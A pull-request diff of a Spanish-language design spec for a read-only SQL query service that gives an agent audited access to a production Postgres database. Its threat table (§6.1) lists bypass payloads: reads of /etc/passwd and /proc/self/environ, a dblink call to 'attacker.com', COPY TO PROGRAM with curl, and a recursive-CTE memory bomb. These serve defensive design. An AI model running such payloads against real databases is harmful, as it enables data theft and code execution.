### PR TITLE
docs(spec): prod query tool — agent-accessible read-only SQL contra Cloud SQL prod

### DIFF
--- a/docs/specs/2026-05-17-prod-query-tool.md
+++ b/docs/specs/2026-05-17-prod-query-tool.md
@@ -276,7 +276,7 @@ Se importa directo (`import { redactPII } from '@booster-ai/logger'`). Tests en 
 | Devils-advocate del PR + fixes | Multiple rounds | 1-2h |
 | **Total** | | **15-17h** |
 
-Más realista que v1 (6-8h). Distribuir en 3-4 sesiones de 4-5h. **No debe meterse antes de Corfo 2026-05-18**.
+Más realista que v1 (6-8h). Distribuir en 3-4 sesiones de 4-5h con cooling-off entre cada una. Fecha de cierre se determina por completitud de los 6 quality gates de §13, no por deadlines externos.
 
 ## 9. Open questions (resueltas vs v1)
 
@@ -329,6 +329,15 @@ Concerns esperados en review v2:
 5. ADR-045 documenta decisión + alternativas descartadas + supersede parcial de ADR-013 Phase 2.
 6. Update CLAUDE.md memoria con la nueva capacidad disponible (después del merge).
 
-## 13. NOT before Demo Corfo 2026-05-18
+## 13. Calidad antes que fechas externas
 
-Esta spec NO se mete en sprint pre-demo. La friction de G1 dolió hoy pero esta spec construye superficie de ataque nueva — merece tiempo para revisar adversarial sin presión del demo. Approval del spec OK ahora; BUILD post-demo.
+Esta spec construye superficie de ataque permanente (servicio con acceso a prod DB). No se mergea bajo presión de deadlines externos. **El BUILD se completa cuando**:
+
+1. Devils-advocate v2 del spec confirma cero P0 residuales.
+2. Plan H1-H10 revisado adversarial sin objeciones bloqueantes.
+3. Cada PR del BUILD pasa code-reviewer + security-auditor + devils-advocate.
+4. Test list §7 (28 tests) verde end-to-end.
+5. Terraform plan validado en CI sin warnings.
+6. ADR-045 documenta cada decisión + alternativas descartadas con razón.
+
+Fechas comerciales (demos, presentaciones, deliverables externos) se programan **después** de tener evidencia verificable de los 6 puntos anteriores. La friction de G1 quedó documentada y la dimos resolución manual hoy — no es bloqueante para nada urgente.

--- a/docs/specs/2026-05-17-prod-query-tool.md
+++ b/docs/specs/2026-05-17-prod-query-tool.md
@@ -2,181 +2,333 @@
 
 - **Author**: Felipe Vicencio (PO) + Claude (agent-rigor)
 - **Date**: 2026-05-17
-- **Status**: **Draft** — pendiente PO approval
+- **Status**: **Draft v2** — pendiente PO approval (rewrite post devils-advocate review)
 - **Linked**: friction encontrada en G1 del plan `migration-journal-integrity-guard`
+- **Supersedes (parcial)**: ADR-013 §"Phase 2 — Capa 2 IAM auth" — esta spec abre una **Capa 4 — agent ad-hoc reads** dentro del modelo del ADR existente.
 - **ADR a crear**: `045-prod-query-tool.md`
+
+---
+
+## Cambios respecto a v1 (post devils-advocate)
+
+Devils-advocate review identificó 3 P0 + 6 P1 + 4 P2. v2 incorpora:
+
+| # | Hallazgo | Cambio en v2 |
+|---|---|---|
+| P0-1 | `infrastructure/modules/iap-bastion/` ya existe + ADR-013 + `scripts/db/connect.sh` — la v1 los ignoró | **§10 reescrito** con auditoría honesta del bastion existente. Verificación 2026-05-17: `gcloud compute start-iap-tunnel` falla con mismo `Reauthentication failed` que `gcloud sql connect` cuando el OAuth user expira. El bastion **no resuelve** el problema headless del agente porque IAP tunneling **requiere user OAuth interactivo**, no acepta ADC para el túnel mismo. Esta spec se posiciona como **Capa 4 del ADR-013** (agent ad-hoc reads), no como reemplazo de Capa 1 (operadores humanos). |
+| P0-2 | SQL AST parsing tiene 10+ categorías de bypass no enumeradas | **§6 expandido** con enumeración completa de bypass + mitigaciones específicas. AST parser es **canario, no perímetro**. Defense in depth verdadero es DB user GRANTs explícitos. |
+| P0-3 | Audit table en misma DB = loop circular de confianza | **§4 redesign**: audit SOLO a Cloud Logging structured + BigQuery sink (log router) — sin tabla en Cloud SQL. Service account de Cloud Run runtime tiene `roles/logging.logWriter`, cero DB write privileges. |
+| P1-1 | PII redaction naive, no reutiliza `packages/logger` | **CR-5 reescrito** para importar `@booster-ai/logger` (commits `0c9888e`, `3086e62`). Sin re-implementar patrones |
+| P1-2 | Rate limit server-side enforcement story incompleta | **§4 + CR-6 expandidos**: rate limit via Cloud Run concurrency=1 + token bucket en memoria del único container + alerta Cloud Monitoring al 80% del budget. Si bypass por restart, max queries/min sigue acotado por container concurrency |
+| P1-3 | SA key del invoker en laptop viola CLAUDE.md §7 | **CR-4 reescrito**: solo OAuth user `dev@boosterchile.com`. Cero SA key descargada. Para Cloud Run runtime sí hay SA (es identidad de servicio, no descargable). Cumplimiento §7 explícito |
+| P1-4 | Estimate 6-8h subestima 50-100% | **§8 actualizado** a 15-17h realista con desglose por sub-tarea |
+| P1-5 | Test list no cubre todos los CRs | **§7 expandido** a 28 tests (era 12). Cada bypass de P0-2 ahora es un test |
+| P1-6 | Schema introspection load-bearing para v1 | **§3 CR-11+CR-12 nuevos**: endpoints `GET /schema/tables` + `GET /schema/columns` en v1, no v2 |
 
 ---
 
 ## 1. Objetivo
 
-Tener una herramienta que permita ejecutar **queries SELECT read-only** contra Cloud SQL prod desde cualquier shell headless del agente, sin requerir intervención humana ni acceso interactivo a Cloud SQL Studio web UI. Eliminar el bloqueo que vimos hoy en G1 (verificar si una tabla existía en prod tomó coordinación humana + UI manual).
+Habilitar al agente (Claude/SDK) a ejecutar **queries SELECT read-only** contra Cloud SQL prod desde shell headless, sin intervención humana ni acceso interactivo a Cloud SQL Studio web UI. Eliminar el bloqueo expuesto en G1 (verificar si una tabla existía tomó ~11 min de coordinación humana).
 
 ## 2. Why now
 
-Sesión 2026-05-17 expuso el costo del flujo manual:
+Sesión 2026-05-17 expuso el costo del flujo manual y reveló que el bastion existente NO cubre el caso:
 
-| Paso | Tiempo real | Costo |
-|---|---|---|
-| Identificar instancia Cloud SQL via REST API | 1 min | OK (ADC funciona) |
-| Intentar `gcloud sql connect` | 2 min | FALLA (user auth expirado, requiere interactive re-login) |
-| Intentar cloud-sql-proxy local | 3 min | FALLA (private IP no enrutable desde fuera VPC) |
-| Intentar `gcloud cloud-shell ssh` | 1 min | FALLA (mismo user auth) |
-| Coordinación + setup Cloud SQL Studio web UI | 4 min | OK pero requiere humano + click |
-| **Total** | **~11 min** | Para 1 query trivial |
+| Camino intentado | Estado verificado |
+|---|---|
+| `gcloud sql connect` directo | FALLA — user OAuth requerido, no acepta ADC |
+| `gcloud compute start-iap-tunnel` (bastion ADR-013) | **FALLA igual** — verificado 2026-05-17 19:30 UTC. IAP tunneling también requiere user OAuth interactivo. ADC alone insufficient |
+| cloud-sql-proxy local | FALLA — private IP no enrutable |
+| `gcloud cloud-shell ssh` | FALLA — mismo user OAuth requirement |
+| Cloud SQL Studio web UI | FUNCIONA — pero requiere humano clickeando |
+| REST API Cloud SQL Admin | Sirve para metadata (ADC funciona) — pero NO expone "execute SQL" |
 
-Si esto fuera recurrente (5-10 veces/sprint), el costo agregado es prohibitivo. Hay varias categorías de verificaciones que necesitamos rutinariamente contra prod:
+**El gap específico que esta spec cierra**: el agente puede usar ADC sin intervención humana (`gcloud auth application-default print-access-token` funciona headless), pero ningún camino existente le permite **invocar queries** contra prod con esa credencial.
 
-- "¿Existe la tabla/columna X tras migration?"
-- "¿Cuántos registros con condición Y?"
-- "¿Cuáles son los últimos N timestamps de tabla Z?" (debugging incidentes)
-- "¿Está aplicada la migration ABC en `__drizzle_migrations`?"
+Use cases recurrentes que hoy bloqueamos:
+- "¿Existe la tabla/columna X tras migration?" (caso real G1 2026-05-17).
+- "¿Cuántos registros con condición Y?" (debugging incidentes).
+- "¿Cuáles son los últimos N timestamps de tabla Z?" (forensia).
+- "¿Está aplicada la migration ABC en `drizzle.__drizzle_migrations`?" (verificación pre-deploy).
 
-Hoy 0 de estas se pueden hacer sin coordinación humana. La privacidad del data (PII conductores, shippers) **no** justifica el bloqueo — el control debe ser por permisos (IAM read-only + audit log), no por friction operacional.
+5-10 friction events/sprint × ~10 min coordinación humana = ~1-2h/sprint, que escala con scope del proyecto.
 
 ## 3. Success criteria
 
-- [ ] **CR-1**: Existe un servicio Cloud Run privado `prod-query-tool` con endpoint `POST /query` que acepta `{ "sql": "...", "params": [...] }` y retorna `{ "rows": [...], "rowCount": N, "durationMs": M }`.
-- [ ] **CR-2**: El servicio rechaza con HTTP 400 cualquier SQL que NO sea `SELECT`/`WITH`/`EXPLAIN` (parsing AST básico; no string-match heurístico). DML, DDL, FUNCTION calls con side-effects bloqueados.
-- [ ] **CR-3**: El servicio conecta a Cloud SQL prod con un DB user dedicado `booster_query_tool` que tiene **solo** GRANT SELECT en `public.*` y `drizzle.*`. NO tiene GRANT INSERT/UPDATE/DELETE/TRUNCATE/ALTER. Defense in depth: si CR-2 falla, el DB rechaza igualmente.
-- [ ] **CR-4**: El servicio requiere autenticación IAM Cloud Run (`run.invoker` role). Solo dos principals autorizados: (a) `dev@boosterchile.com` (PO), (b) un service account dedicado `agent-query-invoker@booster-ai-494222.iam.gserviceaccount.com` cuyo key vive en `~/.config/gcloud/application_default_credentials.json` del laptop del PO (ya existente via ADC).
-- [ ] **CR-5**: Cada query genera **dos** entries de log estructurado: (a) en Cloud Logging del servicio (con `traceId`, principal, SQL hash, rowCount, durationMs); (b) en una tabla nueva `auditoria_query_tool` en Cloud SQL prod (append-only, retención 90d, PII redacted en el SQL almacenado). Compliance: este uso queda trazable retroactivamente.
-- [ ] **CR-6**: Rate limit: máx 60 queries/min por principal. Query timeout: 30s (Cloud Run + statement_timeout en pg session). Retornos >10 MB rechazados (LIMIT enforcement client-side).
-- [ ] **CR-7**: Helper CLI local `pnpm prod-query "SELECT ..."` que envuelve la llamada (fetch ADC token + POST + parse + print). El agente lo invoca como Bash command.
-- [ ] **CR-8**: Service deployed a Cloud Run con VPC connector apuntando al mismo subnet que `apps/api` (acceso a la private IP de Cloud SQL).
-- [ ] **CR-9**: Infraestructura via Terraform en `infrastructure/modules/prod-query-tool/`. Cero recursos creados manualmente. ADR-045 documenta la decisión.
-- [ ] **CR-10**: Existe `apps/prod-query-tool/test/integration/query.integration.test.ts` que verifica: (a) SELECT pasa, (b) UPDATE rechazado con 400, (c) DROP rechazado con 400, (d) rate limit funciona tras 61 calls.
+- [ ] **CR-1**: Existe un servicio Cloud Run privado `prod-query-tool` con endpoint `POST /query` que acepta `{ "sql": "...", "params": [...] }` y retorna `{ "rows": [...], "rowCount": N, "durationMs": M, "queryId": "..." }`.
+- [ ] **CR-2**: El servicio rechaza con HTTP 400 cualquier SQL que NO sea uno de: `SELECT`, `WITH ... SELECT`, `EXPLAIN`, `EXPLAIN ANALYZE`. El parsing usa AST library pinneada (`pg-query-parser-wasm` con SHA documentado en lockfile) y **adicionalmente** una denylist explícita de side-effecting functions (ver §6.1).
+- [ ] **CR-3**: DB user dedicado `booster_query_tool` con privilegios mínimos:
+  - `GRANT CONNECT ON DATABASE booster_ai TO booster_query_tool;`
+  - `GRANT USAGE ON SCHEMA public, drizzle TO booster_query_tool;`
+  - `GRANT SELECT ON ALL TABLES IN SCHEMA public, drizzle TO booster_query_tool;`
+  - `ALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT SELECT ON TABLES TO booster_query_tool;`
+  - `REVOKE TEMP ON DATABASE booster_ai FROM booster_query_tool;` (bloquea TEMP table creation; `TEMP` es sinónimo SQL aceptado del privilege).
+  - `REVOKE EXECUTE ON ALL FUNCTIONS IN SCHEMA pg_catalog FROM booster_query_tool;` (denylist por defecto en functions; allowlist explícita post-revoke).
+  - Estado verificado en CI via `\dp` snapshot test.
+- [ ] **CR-4**: Auth Cloud Run IAM (`run.invoker` role) bound a **dev@boosterchile.com** vía OAuth user-bound, **sin SA key descargada**. La identidad efectiva del invoker es el usuario OAuth del PO (ADC). Cumple CLAUDE.md §7 ("ADC + OAuth, nunca API keys").
+- [ ] **CR-5**: Audit log: **solo Cloud Logging structured** (NO tabla en Cloud SQL). Sink configurado vía Terraform a BigQuery (`booster-ai-494222.audit.query_tool_log`) con retención 90d en BigQuery (configurable a 1 año post-confirmación compliance). Cada entry incluye: `traceId`, `principal_email`, `sql_hash` (sha256 del SQL crudo), `sql_redacted` (SQL con literales PII reemplazados por placeholders via `@booster-ai/logger` redaction primitives), `params_count`, `rowCount`, `durationMs`, `result_bytes`, `query_id` (uuid v4). El logger del servicio usa los serializers PII de `packages/logger` directamente.
+- [ ] **CR-6**: Rate limit + resource limits:
+  - 60 queries/min/principal enforced server-side via token bucket in-memory (instance única + Cloud Run concurrency=1 → no race).
+  - Alerta Cloud Monitoring si excede 100 queries/hora (60% del budget proyectado).
+  - `statement_timeout = 10s` en pg session (no 30s — recursive CTEs crashean Postgres antes).
+  - `work_mem = 64MB` en session (evita OOM bombs).
+  - Result size limit 10 MB client-side (LIMIT enforcement).
+  - Cloud Run service timeout 15s (corta queries colgadas antes del statement_timeout fallar gracefully).
+- [ ] **CR-7**: Helper CLI local `pnpm prod-query "SELECT ..."` (workspace script en root `package.json`) que:
+  - Fetcha ADC token via `gcloud auth application-default print-access-token`.
+  - POST al service con el SQL.
+  - Imprime resultado formato tabla en stdout, error con HTTP code + body en stderr.
+  - Exit code 0 si query exitosa, ≠0 en cualquier error.
+- [ ] **CR-8**: Cloud Run service deployado en `southamerica-west1` con VPC connector que apunta al subnet `apps-vpc-connector` (mismo que `apps/api`) para alcance a private IP de Cloud SQL.
+- [ ] **CR-9**: Infrastructure via Terraform en `infrastructure/modules/prod-query-tool/`. Recursos:
+  - `google_cloud_run_v2_service`
+  - `google_service_account` (runtime + invoker policy)
+  - `google_cloud_run_v2_service_iam_member` con condition (solo dev@boosterchile.com)
+  - `google_sql_user` (booster_query_tool, autenticación IAM Postgres)
+  - `google_logging_project_sink` (BigQuery sink)
+  - `google_bigquery_dataset` (audit)
+  - `google_monitoring_alert_policy` (rate limit + error rate)
+  - `terraform plan` se valida en CI.
+- [ ] **CR-10**: `apps/prod-query-tool/test/integration/` con suite paralela a `apps/api/test/integration/` (reusa setup pattern de T1+T1b mergeados 2026-05-17). 28 tests (ver §7).
+- [ ] **CR-11**: Endpoint `GET /schema/tables` retorna `[{ schema, name, type }]` para `public.*` y `drizzle.*`. Query pre-baked contra `information_schema.tables`. No acepta input del cliente.
+- [ ] **CR-12**: Endpoint `GET /schema/columns?table=X` retorna `[{ name, dataType, nullable, default }]`. Query pre-baked contra `information_schema.columns` con `WHERE table_name = $1`. Param sanitizado.
 
-## 4. Diseño técnico (sketch)
+## 4. Diseño técnico
 
-### Stack
+### 4.1. Stack
 
-- Cloud Run service (mínima imagen Node.js).
-- Backend: Hono (consistente con `apps/api`).
-- DB driver: `pg` directo (sin Drizzle — el servicio NO necesita el ORM, solo executes raw SQL del request).
-- SQL parsing: `pg-query-parser-wasm` (o equivalente) para AST-level validation que el statement es SELECT.
+- Cloud Run service v2, imagen Node.js 22 (consistente con apps/api).
+- Backend: Hono (consistente).
+- DB driver: `pg` directo (sin Drizzle — el servicio NO necesita ORM).
+- SQL parsing: `pg-query-parser-wasm` pinned con SHA en pnpm-lock.yaml.
+- Logger: `@booster-ai/logger` (mismo serializers PII).
+- Audit sink: Cloud Logging structured → BigQuery via log router.
 
-### Flujo de un request
+### 4.2. Flujo de request
 
 ```
 [agente local]
    pnpm prod-query "SELECT to_regclass('public.X')"
    ↓
-   gcloud auth application-default print-access-token
+   gcloud auth application-default print-access-token  → token OAuth user
    ↓
    POST https://prod-query-tool-xxx.a.run.app/query
    Authorization: Bearer <token>
-   { "sql": "SELECT to_regclass('public.X')", "params": [] }
+   Body: { sql: "SELECT to_regclass('public.X')", params: [] }
    ↓
 [Cloud Run service]
-   IAM check (run.invoker) → 401 si falla
-   Rate limit check → 429 si excedido
-   Parse SQL → 400 si no es SELECT-like
-   Connect to Cloud SQL (private IP via VPC connector)
-   pg.query(sql, params) con statement_timeout=30s
-   Audit log → Cloud Logging + auditoria_query_tool table
-   Return JSON
+   1. IAM Cloud Run: validate token + invoker policy (dev@boosterchile.com only)
+      ↓ 401 si token inválido; 403 si principal no autorizado
+   2. Rate limit check (token bucket per principal, 60/min)
+      ↓ 429 si excedido
+   3. Parse SQL → AST validation:
+      - Statement must be SELECT / WITH+SELECT / EXPLAIN
+      - Reject INTO, FOR UPDATE/SHARE, function calls in denylist (ver §6.1)
+      ↓ 400 si rechazado
+   4. Acquire pg client (pool max=5, statement_timeout=10s, work_mem=64MB)
+   5. Execute pg.query(sql, params)
+   6. Truncate result si rowCount × avg_row_size > 10 MB
+   7. Compute sql_redacted via @booster-ai/logger PII serializer
+   8. Emit Cloud Logging structured event (BigQuery sink picks up)
+   9. Return JSON
    ↓
 [agente local]
-   Print formatted result
+   Parse + tabular print
 ```
 
-### IAM model
+### 4.3. Audit sink (resuelve P0-3)
 
-- DB user `booster_query_tool` con `GRANT SELECT ON ALL TABLES IN SCHEMA public, drizzle TO booster_query_tool;` + `ALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT SELECT ON TABLES TO booster_query_tool;` (futuras tablas también).
-- Service account `prod-query-tool@booster-ai-494222.iam.gserviceaccount.com` (runtime de Cloud Run) con `roles/cloudsql.client` solamente.
-- IAM Conditions sobre Cloud Run service: solo permite invoker desde `dev@boosterchile.com` o `agent-query-invoker@`.
+```
+[service Cloud Run]
+   logger.info({
+     query_id, principal_email, sql_hash, sql_redacted,
+     params_count, rowCount, durationMs, result_bytes
+   }, 'prod-query-tool: query executed')
+   ↓
+[Cloud Logging]
+   structured entry con severity INFO
+   ↓
+[Log router sink: project=booster-ai-494222 filter='resource.labels.service_name="prod-query-tool"']
+   ↓
+[BigQuery: dataset=audit, table=query_tool_log]
+   partitioned by date, expiration 90d (compliance baseline)
+```
+
+El service account de Cloud Run runtime tiene:
+- `roles/cloudsql.client` (conectar a Cloud SQL)
+- `roles/logging.logWriter` (escribir audit)
+- **NO** roles BigQuery (write va via log router, no via app code)
+- **NO** roles secret manager (DB password via IAM auth, no via secret)
+
+Esta separación elimina el loop circular: el servicio NO puede leer su propio audit, no puede modificarlo, y NO está en la misma DB que las queries.
 
 ## 5. Out of scope
 
-- **No** ejecutar DML/DDL/maintenance commands. Migrations siguen siendo el único path para schema changes.
-- **No** queries de larga duración (background, materialized views). 30s hard limit.
-- **No** Spanner, AlloyDB, BigQuery. Solo Cloud SQL Postgres prod.
-- **No** abrir el servicio a non-Booster principals. Es una herramienta interna del equipo, no para clientes ni stakeholders.
-- **No** UI web custom. Cloud SQL Studio sigue siendo opción para casos exploratorios complejos.
-- **No** caching de query results. Cada call hits DB.
-- **No** acceso a otros environments (dev, staging). Solo prod. Para dev usar `booster_test_prototype` local.
+- DML, DDL, FUNCTION calls con side-effects. Migrations siguen siendo el único path.
+- Queries de larga duración (>10s). Background jobs son otro pattern.
+- Spanner, AlloyDB, BigQuery (esta spec solo cubre Cloud SQL Postgres prod).
+- Otros environments (dev, staging) — solo prod. Para dev usar `booster_test_prototype` local.
+- Acceso desde non-Booster principals (clientes, stakeholders).
+- UI custom — Cloud SQL Studio sigue siendo opción para humanos.
+- Caching de results — cada call hits DB (idempotencia + audit-per-call).
 
 ## 6. Risks + mitigations
 
+### 6.1. P0-2 expansion — bypass surface de SQL AST parsing
+
+AST parsing es **canario**, no perímetro. Mitigación verdadera es DB GRANTs + denylist + pg_audit.
+
+| Categoría de bypass | Ejemplo | Mitigación primaria | Mitigación de defensa |
+|---|---|---|---|
+| Function with side-effects | `SELECT pg_terminate_backend(pid)` | AST denylist functions | `REVOKE EXECUTE` en pg_catalog.pg_terminate_backend FROM booster_query_tool |
+| FS read | `SELECT pg_read_server_files('/etc/passwd')` | AST denylist | REVOKE EXECUTE; rol no es superuser anyway |
+| FS read environment | `SELECT pg_read_binary_file('/proc/self/environ')` | AST denylist | REVOKE EXECUTE |
+| FS write | `SELECT lo_export(loid, '/tmp/x')` | AST denylist + REVOKE | rol no tiene CREATE en pg_largeobject |
+| Outbound conn | `SELECT * FROM dblink('host=attacker.com ...')` | AST detect dblink call | Extension dblink NO instalada en booster_ai (verified) |
+| DDL disfrazada | `SELECT ... INTO new_table FROM ...` | AST detect INTO clause | rol no tiene CREATE en public schema |
+| Lock escalation | `SELECT ... FOR UPDATE` | AST detect locking clauses | statement_timeout=10s acota damage |
+| RCE via COPY | `COPY (SELECT ...) TO PROGRAM 'curl ...'` | AST rechaza COPY statement entirely | rol no tiene SUPERUSER (COPY TO PROGRAM requires) |
+| OOM bomb | `WITH RECURSIVE r AS (SELECT 1 UNION ALL SELECT r.x+1 FROM r) SELECT * FROM r LIMIT 1e10` | `work_mem=64MB` + `statement_timeout=10s` | Cloud Run instance memory limit 1GB con OOMKill |
+| Session mutation | `SELECT setseed(0.5)` | AST denylist setting-mutating functions | session se cierra al final del request (pool wraps connection per query) |
+| TEMP table create | `CREATE TEMP TABLE ...` | AST rechaza CREATE entirely | `REVOKE TEMP ON DATABASE` |
+| Config leak | `SELECT current_setting('cluster_name')` | Allowed (read-only metadata) | Mitigado vía `REVOKE EXECUTE` en `pg_read_all_settings`-class |
+
+**Pre-condición operacional**: ejecutar y commitear el output de `\df+ pg_catalog.*` (list de funciones con SECURITY DEFINER o INVOKER de alto riesgo) y revisar denylist contra esa lista cada Postgres minor release.
+
+**SQL parser CVE process**: `pg-query-parser-wasm` versión pinneada con SHA en pnpm-lock.yaml. CI corre `pnpm audit` que incluye este package. Si hay CVE high+, bloquea merge.
+
+### 6.2. P0-3 — audit log loop circular (resuelto)
+
+Audit no vive en `booster_ai`. Vive en Cloud Logging → BigQuery `audit` dataset. El service account del servicio NO tiene roles BigQuery — solo `logging.logWriter` (que es write-only, no read). El servicio no puede leer su propio audit. Cumplimiento auditable.
+
+### 6.3. PII redaction (resuelve P1-1)
+
+`@booster-ai/logger` exporta `redactPII(text: string): string` que cubre:
+- Emails (RFC-aware)
+- RUTs chilenos (todos los formatos `12345678-9`, `12.345.678-9`, `123456789`)
+- Teléfonos chilenos (`+56 9 1234 5678`, `912345678`, `(02) 2123 4567`)
+- Custom IDs (UUIDs)
+- Coordenadas geo (lat/lng con decimales)
+- Números > 8 dígitos consecutivos (fallback genérico)
+
+Se importa directo (`import { redactPII } from '@booster-ai/logger'`). Tests en `packages/logger/test/` cubren los patrones. Cualquier patrón nuevo que descubramos se agrega allí, propaga acá automáticamente.
+
+### 6.4. Other risks
+
 | Riesgo | Mitigación |
 |---|---|
-| SQL injection si el agente construye queries con concat de strings de input externo | El agente es el único caller; las queries son curated por él. Aún así: usar parameterized queries (`$1, $2`) siempre; el servicio expone `params: []` para forzar el patrón. |
-| Agent runaway: hace 1000s de queries en un loop | Rate limit 60/min + alerta Cloud Monitoring si excede 100/hora |
-| Service account key leak | No hay key — usamos ADC del laptop del PO. La autenticación es identity-bound, no key-bound |
-| Auditoría query muestra PII en SQL almacenado | Pre-storage hook redacta patrones conocidos (emails, RUTs, números > 8 dígitos consecutivos). Filtros documentados en spec |
-| Cloud SQL gets DDOS via query tool | statement_timeout + connection limit per service (5 connections max al pool); el servicio Cloud Run scaleará a max 1 instance |
-| Bypass del read-only via funcciones (`pg_read_binary_file()`, etc.) | DB user no tiene EXECUTE en funciones peligrosas. Lista de funciones permitidas explícita en `booster_query_tool` GRANT |
+| SQL injection vía concat (no params) | Servicio expone `params: []` separado de `sql`. CI test verifica que parameterized queries funcionan correctamente |
+| Agent runaway 1000s queries en loop | Rate limit 60/min + alerta a 100/hora + service timeout 15s + Cloud Run max instances=1 → throughput bounded |
+| Service compromise → prod read | Defense in depth: IAM cond + AST parser + DB GRANTs solo SELECT. Worst case compromise = read PII (which is what tool is for); cero write |
+| OAuth de dev@boosterchile.com phished | MFA obligatoria en cuenta (Google Workspace policy). Alert si signin desde IP nueva. Audit log captura cada query → forensia |
+| Cloud Logging quota | ~50k entries/mes esperado (2/sprint × 5 friction events × 8 sprints/year × 12 months) = bajo Cloud Logging default quota (~50 GB/mes free) |
+| BigQuery cost | 50k rows/mes × 1KB row = 50 MB/mes. BigQuery free tier suficiente |
+| Stakeholder PII exfil via repeated queries | k-anonymity en `stakeholder_*` tables ya implementada (ADR-041/042). Audit log captura repeated pattern; alerta si >20 stakeholder-related queries/hora |
 
 ## 7. Test list
 
-| # | Test | Tipo |
+| # | Test | Tipo | CR target |
+|---|---|---|---|
+| 1 | SELECT pasa, retorna rows | integration | CR-1 |
+| 2 | WITH... SELECT pasa | integration | CR-2 |
+| 3 | EXPLAIN pasa | integration | CR-2 |
+| 4 | UPDATE rechazado 400 | integration | CR-2 |
+| 5 | INSERT rechazado 400 | integration | CR-2 |
+| 6 | DELETE rechazado 400 | integration | CR-2 |
+| 7 | DROP TABLE rechazado 400 | integration | CR-2 |
+| 8 | CREATE FUNCTION rechazado 400 | integration | CR-2 |
+| 9 | SELECT pg_terminate_backend(...) rechazado 400 | integration | §6.1 bypass |
+| 10 | SELECT pg_read_server_files(...) rechazado 400 | integration | §6.1 bypass |
+| 11 | SELECT lo_export(...) rechazado 400 | integration | §6.1 bypass |
+| 12 | SELECT ... INTO new_table rechazado 400 | integration | §6.1 bypass |
+| 13 | SELECT ... FOR UPDATE rechazado 400 | integration | §6.1 bypass |
+| 14 | COPY ... TO PROGRAM rechazado 400 | integration | §6.1 bypass |
+| 15 | WITH RECURSIVE bomb hits statement_timeout 10s → 504 | integration LONG | §6.1 + CR-6 |
+| 16 | Rate limit dispara 429 tras 61 calls/min | integration | CR-6 |
+| 17 | Unauth (sin Bearer) → 401 | integration | CR-4 |
+| 18 | Auth pero principal no autorizado → 403 | integration | CR-4 |
+| 19 | SQL injection patterns en `params` tratados como string literal | integration | §6.4 |
+| 20 | Audit entry en Cloud Logging tiene PII redacted | integration | CR-5 |
+| 21 | Audit entry tiene query_id único | integration | CR-5 |
+| 22 | DB user `\dp` verification: solo SELECT en public + drizzle | integration | CR-3 |
+| 23 | DB user no puede crear TEMP table | integration | CR-3 / §6.1 |
+| 24 | GET /schema/tables retorna lista válida | integration | CR-11 |
+| 25 | GET /schema/columns?table=X retorna columns | integration | CR-12 |
+| 26 | CLI helper `pnpm prod-query` retorna JSON parseable | integration local + deployed | CR-7 |
+| 27 | PII redaction tests (emails, RUTs, phones) — heredados de @booster-ai/logger | unit | §6.3 |
+| 28 | Terraform plan verde sin errores | CI | CR-9 |
+
+## 8. Estimación de esfuerzo (realista, post-P1-4)
+
+| Fase | Tareas | Tiempo |
 |---|---|---|
-| 1 | SELECT pasa | integration |
-| 2 | UPDATE rechazado con 400 + mensaje claro | integration |
-| 3 | DROP TABLE rechazado con 400 | integration |
-| 4 | Statement con `CREATE FUNCTION` rechazado | integration |
-| 5 | Rate limit dispara 429 tras 61 calls/min | integration |
-| 6 | Timeout dispara 504 tras 30s | integration (LONG) |
-| 7 | Unauth (sin Bearer) → 401 | integration |
-| 8 | Auth pero principal no autorizado → 403 | integration |
-| 9 | SQL injection patterns en `params` (no en `sql`) → tratado como string literal | integration |
-| 10 | Audit row creada en `auditoria_query_tool` por cada call | integration |
-| 11 | PII redaction en audit row (email + RUT redactados) | unit |
-| 12 | Helper CLI `pnpm prod-query` retorna JSON parseado | integration (local + service deployed) |
+| Plan + devils-advocate del plan | breakdown atómico H1-H10+ | 1.5h |
+| Terraform | VPC connector + Cloud Run service + IAM bindings + log sink + BQ dataset + alert policies | 2h |
+| DB user provisioning + GRANT/REVOKE + verification | Migration o script + tests | 1.5h |
+| Service core | Hono + pg client + AST parser + denylist | 2h |
+| Audit logging + PII redaction wiring | Reusar packages/logger + structured emit | 1h |
+| Rate limit + resource limits | Token bucket + statement_timeout config | 1h |
+| Schema introspection endpoints | /schema/tables + /schema/columns | 0.5h |
+| CLI helper + workspace script | pnpm prod-query + tests | 1h |
+| Tests integration (28 tests) | Test infra + each test | 3-4h |
+| ADR-045 | Decisión + alternativas + status | 0.5h |
+| Devils-advocate del PR + fixes | Multiple rounds | 1-2h |
+| **Total** | | **15-17h** |
 
-## 8. Estimación de esfuerzo
+Más realista que v1 (6-8h). Distribuir en 3-4 sesiones de 4-5h. **No debe meterse antes de Corfo 2026-05-18**.
 
-- Spec + plan: 1 sesión (~1h).
-- Build: 3-5 sesiones (~4-6h):
-  - Service skeleton + SQL parsing.
-  - Auth + rate limit.
-  - VPC connector + DB user provisioning via Terraform.
-  - Audit table + redaction.
-  - CLI helper.
-  - Tests.
-- Verify + ship: 1 sesión (~1h).
-- **Total**: ~6-8h focado distribuidas en 1 semana.
+## 9. Open questions (resueltas vs v1)
 
-## 9. Open questions
+| # | Q v1 | Resuelta en v2 |
+|---|---|---|
+| Q1 | SA naming | `prod-query-tool-runtime@booster-ai-494222.iam.gserviceaccount.com` (Cloud Run runtime) + invoker es OAuth user, sin SA invoker |
+| Q2 | Audit location | Cloud Logging structured + BigQuery sink. NO tabla en Cloud SQL |
+| Q3 | CLI path | `package.json` root con `prod-query` script (no package nuevo en `apps/`) |
+| Q4 | Retention | **90d default en BigQuery, configurable a 1 año post-confirmación compliance lead.** Default 90d cumple baseline operacional; 1 año requiere validación legal explícita |
+| Q5 | Schema introspection v1 vs v2 | **v1** — endpoints `/schema/tables` + `/schema/columns` en CR-11/12 |
 
-1. **Service account naming**: `agent-query-invoker` vs `prod-query-tool-invoker`. Default propuesto: `prod-query-tool-invoker`.
-2. **Audit table location**: misma DB que app (`booster_ai`) en schema `auditoria` separado, vs DB dedicada para audit. Default: schema separado en misma DB (menos infra).
-3. **CLI helper path**: `apps/prod-query-tool/cli` package o `scripts/prod-query.mjs` en root. Default: package separado dentro de `apps/prod-query-tool/`.
-4. **Retención audit**: 90d (propuesto) vs 1 año (compliance Ley 19.628). Default a confirmar con compliance lead.
-5. **Cobertura sobre Drizzle schema**: ¿el servicio expone también un endpoint `/schema` que retorna info_schema dumps para introspection sin tener que escribir SQL? Probablemente sí en v2. Out of scope v1.
+Quedan abiertos:
+- ¿Workload Identity Federation para Cloud Run service account en vez de inline IAM? — recomendación para v1.1.
